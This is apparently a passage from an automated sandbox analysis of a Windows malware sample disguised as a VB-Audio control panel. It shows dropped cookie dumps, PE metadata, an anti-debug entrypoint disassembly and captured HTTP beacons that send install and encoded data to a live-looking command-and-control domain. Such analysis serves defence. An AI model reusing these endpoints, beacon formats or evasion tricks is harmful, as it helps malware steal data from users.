                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):103632
                                                                                                                                                Entropy (8bit):6.404475911013687
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
                                                                                                                                                MD5:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                SHA1:B5EE276E8D479C270ECEB497606BD44EE09FF4B8
                                                                                                                                                SHA-256:6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
                                                                                                                                                SHA-512:EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
                                                                                                                                                Malicious:false
                                                                                                                                                C:\Users\user\AppData\Roaming\1611970637183.txt
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\1611970637183.exe
                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):23914
                                                                                                                                                Entropy (8bit):3.719911941386575
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:b3r3Ii3M35gYs3b370v323V3b3h7I67T3qihW/j+es8JlkS3D:bb/cJgYsLL0vmFLR7IUqmR8JlkS3D
                                                                                                                                                MD5:A8B67189AA1F9DAA1DF00583F7A3DA6F
                                                                                                                                                SHA1:0D5F62621E11E7EBA831576B56FADAED57D31DCA
                                                                                                                                                SHA-256:5A427E57B186089AAC42F1C00D9D88ACCCAD0E1C0423BEFA769A7E72E9F826E6
                                                                                                                                                SHA-512:673F9D7CA779F4E136503B6A0B2914BA24E28E23EA78503D9A47308030C02E52A5C95445EC396399ED0DE578F0ED89E5E1038F573A666D71693FAE19F23EF4BA
                                                                                                                                                Malicious:false
Preview: [ { "Modified Time":"6/27/2019 12:54:50 PM", "Expire Time":"6/27/2020 12:54:51 PM", "Host Name":"msn.com", "Path":"/", "Name":"marketPref", "Value":"de-ch", "Secure":"No", "HTTP Only":"Yes", "Host Only":"No", "Entry ID":"2", "Table Name":"CookieEntryEx_10" } , { "Modified Time":"6/27/2019 12:54:50 PM", "Expire Time":"6/27/2020 12:54:50 PM", "Host Name":"msn.com", "Path":"/", "Name":"PreferencesMsn", "Value":"eyJFeHBpcnlUaW1lIjo2MzcyODg1OTMzNjgzNjIzMDUsIlZlcnNpb24iOjF90",

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.867812997543559
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Cyfj6XGbkd.exe
File size: 4247224
MD5: 63204eb716c856723a010747d58a6b00
SHA1: 7e97f00b4c3580cedee02c448ac9aeb54afefbd2
SHA256: 6d2db66a98ec5730bdcbc41dc7c78210fe24fe48bf7e44b59ab01c2084900456
SHA512: 4b00dc3d824d3526972f74b913cff2b1d0e12745de58bfe4ba6196088a17b2346b4ec019bdf923acc57c77f88aa7b17fa230100c6c35b6672c7a39bfa4953c2e
SSDEEP: 49152:roT9J9uexVOSTjyxyFHYRSfSlDR4ZmCc+92ngXBZfiustXoca4P/8uXojZ0Oylih:roT9mexHpullCHlxATtZpJ+8yBVj
File Content Preview: MZ......................@.............................................>....L.!This program cannot be run in DOS mode....$.......$<!,`]O.`]O.`]O.V{D.a]O..AA.u]O..B\.m]O.`]N..]O.V{E..]O..[I.a]O.Rich`]O.................PE..L.....%V...........................

File Icon

Icon Hash: b595139bec4252a9

Static PE Info

General

Entrypoint: 0x403bc3
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp: 0x56250B1B [Mon Oct 19 15:24:11 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 3a057d8e2436bad9e0ae8c20a8d4d334

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
  Subject Chain
    Version:
    Thumbprint MD5:
    Thumbprint SHA-1:
    Thumbprint SHA-256:
    Serial:

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub ebp, 18h
mov dword ptr [ebp-14h], 00403BC3h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F47FD019EA3h
mov eax, dword ptr [edx]
mov esi, esp
mov ecx, esi
push edx
call edi
mov ebx, dword ptr [ebx]
add ebx, eax
mov edx, dword ptr [edx]
mov ebx, dword ptr [ebx]
popad
popfd
push 00000005h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F47FD019E9Fh
pop ebx
inc edi
mov ecx, esi
mov ebx, dword ptr [esp]
mov ecx, dword ptr [ebx]
call dword ptr [eax]
mov ebp, ecx
popad
popfd
mov eax, 00403F45h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F47FD019E9Ch
mov ecx, dword ptr [ecx]
mov ecx, esi
mov ecx, ebp
cmp eax, edx
mov edi, ebp
popad
popfd
push eax
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F47FD019EA1h
mov eax, dword ptr [ebp+00h]
dec eax
imul eax, edx
mov edx, dword ptr [eax]
mov ebx, dword ptr [ecx]
add eax, edx
push ecx
pop eax
popad
popfd
push 000013C5h
pushfd
pushad
xor ecx, ecx
rdtsc
mov ecx, eax
xor eax, eax
rdtsc
sub ecx, eax
cmp ecx, 00000000h
jne 00007F47FD019E9Eh
mov eax, ebx
call esi
mov ecx, dword ptr [edi]
imul eax, edx
call dword ptr [ebx]
dec edx
popad
popfd
push 00000079h

Rich Headers

Programming Language:
• [C++] VS98 (6.0) SP6 build 8804
• [EXP] VC++ 6.0 SP5 build 8804
• [ C ] VS98 (6.0) SP6 build 8804

Data Directories

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb8f0 | 0x8c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x12000 | 0xc0590 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd2000 | 0x1eb8 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0xb000 | 0x1c4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

Sections

| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x9276 | 0xa000 | False | 0.565625 | data | 6.61275809173 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
| .rdata | 0xb000 | 0x12dc | 0x2000 | False | 0.28466796875 | data | 3.67874100082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xd000 | 0x4ea4 | 0x4000 | False | 0.1611328125 | data | 1.88336858311 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x12000 | 0xc0590 | 0xc1000 | False | 0.293020614071 | data | 5.94457194459 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

Resources

| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_BITMAP | 0x124e0 | 0xbf518 | data | French | France |
| RT_ICON | 0x121e0 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4279173368, next used block 2163736576 | French | France |
| RT_MENU | 0xd19f8 | 0x3d4 | data | French | France |
| RT_GROUP_ICON | 0x124c8 | 0x14 | data | French | France |
| RT_VERSION | 0xd1dd0 | 0x3c0 | data | French | France |
| RT_MANIFEST | 0xd2190 | 0x3f9 | XML 1.0 document, ASCII text, with CRLF line terminators | French | France |

Imports

| DLL | Import |
|---|---|
| KERNEL32.dll | FlushFileBuffers, GetStringTypeW, GetStringTypeA, SetStdHandle, LoadLibraryA, GetOEMCP, GetACP, LCMapStringW, MultiByteToWideChar, GetCPInfo, SetFilePointer, WriteFile, TlsGetValue, SetLastError, DeviceIoControl, GetTickCount, CreateFileA, GetLastError, CreateMutexA, ReleaseMutex, WaitForSingleObject, CloseHandle, GetModuleHandleA, GetProcAddress, GetCurrentProcess, LCMapStringA, GetVersionExA, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetFileType, GetStdHandle, HeapFree, HeapAlloc, HeapReAlloc, GetStartupInfoA, GetCommandLineA, GetVersion, ExitProcess, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InterlockedDecrement, InterlockedIncrement, GetModuleFileNameA, GetEnvironmentVariableA, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, RtlUnwind, TerminateProcess, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount |
| USER32.dll | GetMessageA, DispatchMessageA, TranslateMessage, LoadIconA, LoadCursorA, RegisterClassA, CreateWindowExA, ShowWindow, UpdateWindow, GetSystemMetrics, SetWindowPos, SetTimer, BeginPaint, EndPaint, KillTimer, PostQuitMessage, GetDC, ReleaseDC, DefWindowProcA, MessageBoxA, DrawTextA, LoadBitmapA, PostMessageA, SystemParametersInfoA |
| GDI32.dll | SetBkMode, SetTextColor, Rectangle, CreateCompatibleDC, SelectObject, GetObjectA, BitBlt, DeleteDC, DeleteObject, CreateFontIndirectA, CreateBrushIndirect, GetStockObject |
| ADVAPI32.dll | RegOpenKeyExA, RegCreateKeyExA, RegOpenKeyA, RegCreateKeyA, RegSetValueExA, RegCloseKey |
| SHELL32.dll | ShellExecuteA |
| SETUPAPI.dll | SetupDiGetClassDevsA, SetupDiEnumDeviceInterfaces, SetupDiGetDeviceInterfaceDetailA, SetupDiDestroyDeviceInfoList |

                                                                                                                                                    Version Infos

                                                                                                                                                    DescriptionData
                                                                                                                                                    LegalCopyrightV.Burel2012-2015
                                                                                                                                                    InternalNameVBCABLE_ControlPanel
                                                                                                                                                    FileVersion1, 0, 3, 5
                                                                                                                                                    CompanyNameVB-AUDIO Software
                                                                                                                                                    CommentsVB-AUDIO Control Panel forVB-Audio Virtual Cable
                                                                                                                                                    ProductNameVBCABLE_ControlPanel
                                                                                                                                                    ProductVersion1, 0, 3, 5
                                                                                                                                                    FileDescriptionVB-AUDIO Virtual Cable Control Panel
                                                                                                                                                    OriginalFilenameVBCABLE_ControlPanel.exe
                                                                                                                                                    Translation0x0000 0x04b0

                                                                                                                                                    Possible Origin

                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                    FrenchFrance

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets
                                                                                                                                                    Jan 29, 2021 17:36:56.421611071 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:56.421907902 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.421932936 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.422008038 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:56.422802925 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:56.470694065 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:58.555171967 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:58.555293083 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:58.601087093 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:58.605498075 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:58.605531931 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:58.605664968 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:58.606026888 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:58.606061935 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:58.606120110 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:36:58.606961012 CET8049730104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:36:58.752187014 CET4973080192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:37:04.691483974 CET4973480192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:37:04.738665104 CET8049734104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:04.741770029 CET4973480192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:37:04.743166924 CET4973480192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:37:04.788853884 CET8049734104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:04.802903891 CET8049734104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:04.803014040 CET8049734104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:04.803195953 CET8049734104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:04.803246021 CET4973480192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:37:04.803313017 CET8049734104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:04.803493977 CET8049734104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:04.803515911 CET4973480192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:37:04.804337978 CET4973480192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:37:04.850136995 CET8049734104.21.23.16192.168.2.6
                                                                                                                                                    Jan 29, 2021 17:37:04.850219965 CET4973480192.168.2.6104.21.23.16
                                                                                                                                                    Jan 29, 2021 17:37:09.136807919 CET4973080192.168.2.6104.21.23.16

                                                                                                                                                    UDP Packets


DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 29, 2021 17:36:38.183897018 CET | 192.168.2.6 | 8.8.8.8 | 0x4985 | Standard query (0) | 84cfba021a5a6662.xyz | A (IP address) | IN (0x0001)
Jan 29, 2021 17:36:46.307152033 CET | 192.168.2.6 | 8.8.8.8 | 0x9edc | Standard query (0) | 84cfba021a5a6662.xyz | A (IP address) | IN (0x0001)
Jan 29, 2021 17:36:46.616519928 CET | 192.168.2.6 | 8.8.8.8 | 0xda23 | Standard query (0) | 84cfba021a5a6662.xyz | A (IP address) | IN (0x0001)
Jan 29, 2021 17:37:04.603930950 CET | 192.168.2.6 | 8.8.8.8 | 0xd253 | Standard query (0) | 84CFBA021A5A6662.xyz | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 29, 2021 17:36:38.242616892 CET | 8.8.8.8 | 192.168.2.6 | 0x4985 | No error (0) | 84cfba021a5a6662.xyz | | 104.21.23.16 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:36:38.242616892 CET | 8.8.8.8 | 192.168.2.6 | 0x4985 | No error (0) | 84cfba021a5a6662.xyz | | 172.67.208.74 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:36:46.366413116 CET | 8.8.8.8 | 192.168.2.6 | 0x9edc | No error (0) | 84cfba021a5a6662.xyz | | 104.21.23.16 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:36:46.366413116 CET | 8.8.8.8 | 192.168.2.6 | 0x9edc | No error (0) | 84cfba021a5a6662.xyz | | 172.67.208.74 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:36:46.676454067 CET | 8.8.8.8 | 192.168.2.6 | 0xda23 | No error (0) | 84cfba021a5a6662.xyz | | 104.21.23.16 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:36:46.676454067 CET | 8.8.8.8 | 192.168.2.6 | 0xda23 | No error (0) | 84cfba021a5a6662.xyz | | 172.67.208.74 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:37:04.668473959 CET | 8.8.8.8 | 192.168.2.6 | 0xd253 | No error (0) | 84CFBA021A5A6662.xyz | | 104.21.23.16 | A (IP address) | IN (0x0001)
Jan 29, 2021 17:37:04.668473959 CET | 8.8.8.8 | 192.168.2.6 | 0xd253 | No error (0) | 84CFBA021A5A6662.xyz | | 172.67.208.74 | A (IP address) | IN (0x0001)

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • 84cfba021a5a6662.xyz

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49725 | 104.21.23.16 | 80 | C:\Users\user\Desktop\Cyfj6XGbkd.exe

Timestamp | kBytes transferred | Direction | Data
Jan 29, 2021 17:36:38.307451963 CET | 104 | OUT | POST //fine/send HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 82
Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:36:38.307509899 CET | 104 | OUT | Data Raw: 74 79 70 65 3d 69 6e 73 74 61 6c 6c 26 73 65 6c 6c 65 72 3d 75 73 65 72 30 31 26 70 72 69 63 65 3d 2d 30 2e 32 35 26 67 75 69 64 3d 35 30 31 34 46 46 42 35 37 45 36 44 45 44 41 33 26 76 65 72 3d 34 35 2e 30 2e 30 26 6f 72 69 67 69 6e 3d 65 78 65
Data Ascii: type=install&seller=user01&price=-0.25&guid=5014FFB57E6DEDA3&ver=45.0.0&origin=exe
Jan 29, 2021 17:36:38.379690886 CET | 105 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Jan 2021 16:36:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=df39acf80abb8bafc346aa9eed4bd05c41611938198; expires=Sun, 28-Feb-21 16:36:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 07f09a0b4900004c7a80bc4000000001
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=J4ah8qzvvpxv%2BczEwA4ETXiFYM2G6PafyMoa%2BTIAPCky3zl9vDsHg%2B9on5W1BxDxKklki0N0iUmMs72VHFoCwLeoOUZPPRWogFvnfJ58%2B%2FtsA3BoUw%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945f8baafc4c7a-AMS
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="view
                                                                                                                                                    Jan 29, 2021 17:36:38.379713058 CET107INData Raw: 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63
                                                                                                                                                    Data Ascii: port" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' hre
                                                                                                                                                    Jan 29, 2021 17:36:38.379725933 CET108INData Raw: 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20
                                                                                                                                                    Data Ascii: wo"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretendin
                                                                                                                                                    Jan 29, 2021 17:36:38.379738092 CET109INData Raw: 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f
                                                                                                                                                    Data Ascii: </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13">
                                                                                                                                                    Jan 29, 2021 17:36:38.379745007 CET109INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0
                                                                                                                                                    Jan 29, 2021 17:36:38.392950058 CET110OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:38.392991066 CET110OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 61 74 57 64 54 75 4b 73 32 33 32 69 49 42 48 71 50 7a 77 53 43 59 7e
                                                                                                                                                    Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVatWdTuKs232iIBHqPzwSCY~
                                                                                                                                                    Jan 29, 2021 17:36:38.444030046 CET112INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:38 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=df39acf80abb8bafc346aa9eed4bd05c41611938198; expires=Sun, 28-Feb-21 16:36:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a0b9c00004c7abb17b000000001
                                                                                                                                                    Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1TTxIsaBFLlODcFyVV2xP5OLGeOWNBxGyY%2B5l4VYhIX0LLTZs1rFGw%2BLFa2pD%2BFRCB35fr4x%2BzZQjEEecuGAh3F8lttgXT7%2B%2FWV5SUUhHIhsH3AJhg%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945f8c2c9d4c7a-AMS
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="vi
                                                                                                                                                    Jan 29, 2021 17:36:38.444063902 CET113INData Raw: 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d
                                                                                                                                                    Data Ascii: ewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' h
                                                                                                                                                    Jan 29, 2021 17:36:38.444089890 CET114INData Raw: 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20
                                                                                                                                                    Data Ascii: two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretend
                                                                                                                                                    Jan 29, 2021 17:36:38.444117069 CET115INData Raw: 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72
                                                                                                                                                    Data Ascii: </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13
                                                                                                                                                    Jan 29, 2021 17:36:38.444150925 CET116INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0
                                                                                                                                                    Jan 29, 2021 17:36:38.555047035 CET116OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
